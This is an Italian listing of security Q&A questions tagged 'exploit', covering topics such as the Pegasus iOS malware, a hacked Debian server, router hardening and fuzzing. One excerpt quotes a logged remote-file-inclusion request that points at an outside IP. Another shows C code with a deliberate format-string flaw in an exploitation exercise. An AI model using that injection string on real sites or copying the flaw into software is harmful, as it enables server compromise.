Domande con tag 'exploit'

1
risposta

Pegasus iOS exploit e Kernel Memory Corruption

Al momento sto leggendo su Pegasus, il malware su iOS che utilizza 3 giorni zero, nel Blog di Lookout. Post del blog su Pegasus Sono uno studente di cs nel primo anno e capisco che il malware ha bisogno di accedere ai privilegi del kerne...
posta 26.08.2016 - 22:20
1
risposta

Sfruttato da newbie3viLc063s

Il mio server debian è stato sfruttato da alcuni scriptiekiddie che hanno usato Newbie3viLc063 link . Scriptkiddie ha caricato logo_php.png sul mio server (le mie autorizzazioni sono state risucchiate: s) e l'ha eseguito come file php. E ho...
posta 14.04.2013 - 18:21
3
risposte

Attacco root del server?

Qualcuno in Ungheria ha provato qualcosa di strano di recente: /?_SERVER[DOCUMENT_ROOT]=http://94.199.51.7/readme.txt? Questo è l'URL parziale del mio log, che mostra la pagina a cui sono andati. Hanno dato l'URL del mio sito come referrer...
posta 06.04.2013 - 13:08
2
risposte

Come sfruttare il valore della variabile

Sto provando a sfruttare un file binario che ho accesso al codice sorgente. int flag = 0; int main() { char buf[0x50]; puts("Who are you? "); printf("> "); fgets(buf, 0x50, stdin); printf(buf); if (flag == 1337) {...
posta 01.12.2017 - 02:16
1
risposta

Come proteggere un router / modem? [chiuso]

Ho trovato molte risorse su come proteggere le reti WiFi. Questa domanda non riguarda questo. Come posso assicurarmi che il software in esecuzione sul modem / router non sia utilizzabile da noti difetti di sicurezza? Ho trovato rapporti su mol...
posta 01.11.2016 - 20:03
1
risposta

Cookie HTTPonly

Sono stato incaricato di eseguire la scansione di un laboratorio e Nessus ha restituito una vulnerabilità di "Apache HTTP Server httpOnly Cookie Information Disclosure". Quello che vorrei sapere è che cosa contengono questi cookie e come vengono...
posta 11.07.2015 - 14:23
2
risposte

Ci sono metodi per determinare la sfruttabilità dei bug, dopo che un crash è stato trovato in fuzzing?

Ho trovato questo, link Si dice che solo "un'analisi completa delle cause alla radice può garantire che tu abbia correttamente diagnosticato se un dato crash è sfruttabile". È possibile fare tali analisi senza accesso al codice sorgente? Co...
posta 21.03.2015 - 07:35
1
risposta

Protezione di un sito: diversità rispetto alla semplicità?

Questa domanda è stata ricavata dalle mie domande fuori tema qui: La centralizzazione riduce la probabilità ma aumenta il danno degli exploit? Come prima, sospetto che possa essere eccessivamente astratto come una domanda. Ma le eccellenti...
posta 15.07.2013 - 21:08
2
risposte

Agire per tentativi di exploit

Recentemente ho visto circa 40 hit in un secondo per la seguente regola Snort - signature id 1: 16008 , che corrisponde al CVE-2007- 6239 : "... consente agli autori di attacchi in remoto di causare un Denial of Service (arresto anomalo) trami...
posta 25.09.2012 - 14:01
3
risposte

Verifica se un'applicazione Web utilizza componenti vulnerabili noti

Ho svolto ricerche sulle vulnerabilità delle applicazioni Web di Top 10 OWASP, una delle quali è utilizzando componenti con note vulnerabilità . Sono un po 'confuso qui, perché non capisco come si possa controllare un'applicazione web per quest...
posta 22.11.2017 - 22:46